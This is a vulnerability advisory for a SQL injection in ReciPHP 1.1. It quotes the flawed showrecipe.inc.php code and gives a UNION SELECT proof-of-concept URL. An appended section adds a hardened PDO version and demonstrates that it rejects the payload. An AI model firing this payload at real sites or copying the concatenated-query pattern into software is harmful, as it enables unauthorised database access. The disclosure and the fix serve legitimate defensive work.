\#'#/
(-.-)
--------------------oOO---(_)---OOo----------------------
| ReciPHP 1.1 SQL Injection Vulnerability |
---------------------------------------------------------
Author: cr4wl3r <cr4wl3r[!]linuxmail.org> http://0xuht.org
Download: http://sourceforge.net/projects/reciphp/files/
Remote: yes
Tested on: Ubuntu
[!] Reference: http://0xuht.org/Exploit/reciphp.txt
[!] Vulnerable code [showrecipe.inc.php] :
<?php include 'config.php'; ?>
<div id="main">
<div id='preview'><?php
$recipeid = $_GET['id'];
$query = "SELECT title,poster,shortdesc,ingredients,directions from recipes where recipeid = $recipeid";
$result = mysql_query($query) or die('Could not find recipe');
[!] PoC (Piye om Carane):
[Reci PHP ]/index.php?content=showrecipe&id=-3 union select version(),2,3,4,5--
[!] Test:
http://0xuht.org/demo/reciphp.png
[!] Thanks: packetstormsecurity
// Gorontalo [2012-11-14]
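
A hardened form of the lookup in showrecipe.inc.php, as an added example (not part of the original advisory or of ReciPHP's own code). It assumes PDO with an in-memory SQLite table as a stand-in for the application's MySQL database; the function name fetch_recipe and the sample row are hypothetical.

```php
<?php
// Added example: hardened version of the recipe lookup.
// Assumption: PDO + in-memory SQLite stands in for the app's MySQL
// database so the example runs offline.

function fetch_recipe(PDO $db, $rawId): ?array
{
    // 1. Allow-list: recipeid must be a positive integer, nothing else.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // reject instead of passing text into SQL
    }

    // 2. Bound parameter: the value is never concatenated into the statement.
    $stmt = $db->prepare(
        'SELECT title, poster, shortdesc, ingredients, directions
           FROM recipes WHERE recipeid = :id'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data (not from ReciPHP).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE recipes (recipeid INTEGER PRIMARY KEY, title TEXT,
           poster TEXT, shortdesc TEXT, ingredients TEXT, directions TEXT)');
$db->exec("INSERT INTO recipes VALUES (1, 'Pancakes', 'alice', 'Quick breakfast',
           'flour, eggs, milk', 'Mix and fry')");

// A legitimate id, then the id value from the PoC line in this advisory.
$inputs = ['1', '-3 union select version(),2,3,4,5--'];
foreach ($inputs as $input) {
    $recipe = fetch_recipe($db, $input);
    // 3. Encode on output before the value reaches the HTML page.
    echo $recipe === null
        ? "rejected or not found\n"
        : htmlspecialchars($recipe['title'], ENT_QUOTES, 'UTF-8') . "\n";
}
```

The integer check alone stops this specific input; the bound parameter is what keeps the query safe if the validation is later loosened or the column type changes.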